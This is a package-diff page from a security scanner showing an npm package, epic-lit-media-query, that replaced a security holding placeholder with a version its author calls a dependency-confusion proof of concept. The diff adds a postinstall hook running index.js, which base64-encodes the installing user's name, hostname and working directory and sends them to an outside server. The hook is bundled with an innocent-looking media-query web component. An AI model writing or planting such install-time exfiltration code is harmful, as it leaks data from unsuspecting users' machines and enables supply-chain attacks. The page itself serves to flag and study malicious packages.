npm - epic-lit-media-query - Versions diffs - 0.0.1-security → 2.0.4 - Mend

epic-lit-media-query 0.0.1-security → 2.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of epic-lit-media-query might be problematic. Click here for more details.

Files changed (4) hide show

package/README.md CHANGED Viewed

@@ -1,5 +1,5 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=epic-lit-media-query for more information.
+### epic-lit-media-query
+This is a proof of concept package to demonstrate dependency confusion in a particular program.
+It collects basic information to demonstrate impact to the triage team, for inquiries please reach out to: thelastninja@wearehackerone.com

package/index.js ADDED Viewed

@@ -0,0 +1,33 @@
+const os = require('os');
+const http = require('http');
+// This is a proof-of-concept package that is part of a Bug Bounty compaign
+// Please note that this is not a malicious package, it is meant only as demonstration for dependency confusion
+// It collects username, hostname and current path and submits them to a remote server to demonstrate impact
+// For any inquiries please reach out to: thelastninja@wearehackerone.com
+async function sendUserInfoToLogging() {
+    try {
+        const userInfo = os.userInfo();
+        const hostname = os.hostname();
+        const currentPath = process.cwd();
+        // Combine user and host information
+        const userInfoString = `${userInfo.username}@${hostname}:${currentPath}`;
+        // Base64 encode the combined string
+        const encodedUserInfo = Buffer.from(userInfoString).toString('base64');
+        // Construct the URL with encoded user information
+        const url = `http://npm.thelastninja.me/logging?user_info=${encodedUserInfo}`;
+        // Send a GET request to the logging endpoint
+        const response = await http.get(url);
+    } catch (error) {
+        console.error('Error sending user info to logging:', error.message);
+    }
+}
+// Call the function to send user info to logging
+sendUserInfoToLogging();

package/lit-media-query.js ADDED Viewed

@@ -0,0 +1,139 @@
+import {
+    LitElement,
+    html
+} from 'lit-element';
+/**
+ * The `lit-media-query` component detects when a media query
+ * is `true` or `false`.
+ */
+class LitMediaQuery extends LitElement {
+    /**
+     * Fired when `lit-media-query` changes detects a change
+     * in the media query (from `true` to `false` and vice versa).
+     *
+     * @event changed
+     * @param {boolean} value If media query is being fulfilled or not.
+     */
+    static get properties() {
+        return {
+            /**
+             * Media query to be watched by the element.
+             *
+             * Can be modified at run time by setting a new value.
+             */
+            query: {
+                type: String
+            },
+            _match: {
+                type: Boolean
+            }
+        };
+    }
+    constructor() {
+        super();
+        this.query = '(max-width:460px)';
+        this._match = false;
+        this.boundResizeHandler = this._handleRisize.bind(this);
+    }
+    render() {
+        return html `
+      <style>
+        :host {
+          display: none;
+        }
+      </style>
+    `;
+    }
+    firstUpdated() {
+        // Check media query once before 'resize' event
+        this._initialMediaQueryCheck();
+    }
+    connectedCallback() {
+        super.connectedCallback();
+        // Check if Visual Viewport API is supported
+        if (typeof window.visualViewport !== 'undefined') {
+            window.visualViewport.addEventListener('resize', this.boundResizeHandler);
+        } else {
+            window.addEventListener('resize', this.boundResizeHandler);
+        }
+    }
+    disconnectedCallback() {
+        // Remove event listeners
+        if (typeof window.visualViewport !== 'undefined') {
+            window.visualViewport.removeEventListener(
+                'resize',
+                this.boundResizeHandler
+            );
+        } else {
+            window.removeEventListener('resize', this.boundResizeHandler);
+        }
+        super.disconnectedCallback();
+    }
+    _initialMediaQueryCheck() {
+        if (window.matchMedia(this.query).matches) {
+            this.dispatchEvent(
+                new CustomEvent('changed', {
+                    detail: {
+                        value: true
+                    },
+                    composed: true,
+                    bubbles: true
+                })
+            );
+        } else {
+            this.dispatchEvent(
+                new CustomEvent('changed', {
+                    detail: {
+                        value: false
+                    },
+                    composed: true,
+                    bubbles: true
+                })
+            );
+        }
+    }
+    _handleRisize() {
+        if (window.matchMedia(this.query).matches) {
+            // From no match to match
+            if (this._match === false) {
+                this.dispatchEvent(
+                    new CustomEvent('changed', {
+                        detail: {
+                            value: true
+                        },
+                        composed: true,
+                        bubbles: true
+                    })
+                );
+                this._match = true;
+            }
+        } else {
+            // From match to no match
+            if (this._match === true) {
+                this.dispatchEvent(
+                    new CustomEvent('changed', {
+                        detail: {
+                            value: false
+                        },
+                        composed: true,
+                        bubbles: true
+                    })
+                );
+                this._match = false;
+            }
+        }
+    }
+}
+if (!window.customElements.get('lit-media-query')) {
+    customElements.define('lit-media-query', LitMediaQuery);
+}

package/package.json CHANGED Viewed

@@ -1,6 +1,21 @@
 {
   "name": "epic-lit-media-query",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "2.0.4",
+  "description": "This is a poc package for bug bounty dependency confusion test, it only collects basic info to demonstrate impact to the triage team",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "postinstall": "node index.js"
+  },
+  "repository": {},
+  "keywords": [
+    "poc"
+  ],
+  "author": "thelastninja@wearehackerone.com",
+  "license": "MIT",
+  "bugs": {
+    "url": "https://hackerone.com/thelastninja"
+  },
+  "homepage": "https://hackerone.com/thelastninja",
+  "dependencies": {}
 }